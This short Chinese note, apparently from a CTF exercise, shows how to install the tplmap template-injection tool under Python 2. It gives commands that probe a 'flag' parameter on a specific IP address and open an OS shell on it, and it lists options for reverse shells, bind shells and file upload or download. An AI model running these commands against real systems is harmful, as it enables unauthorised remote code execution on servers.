tpl是用python2编写的,报错一般是使用python3
git clone https://github.com/epinna/tplmap
cd tplmap
sudo pip2 install -r requirements.txt
#探测注入点
python2 tplmap.py -u 'http://114.67.246.176:17787/?flag'
#获取shell
python2 tplmap.py -u 'http://114.67.246.176:17787/?flag' --os-shell
–os-shell Run shell on the target
–os-cmd Execute shell commands
–bind-shell PORT Connect to a shell bind to a target port
–reverse-shell HOST PORT Send a shell back to the attacker’s port
–upload LOCAL REMOTE Upload files to the server
–download REMOTE LOCAL Download remote files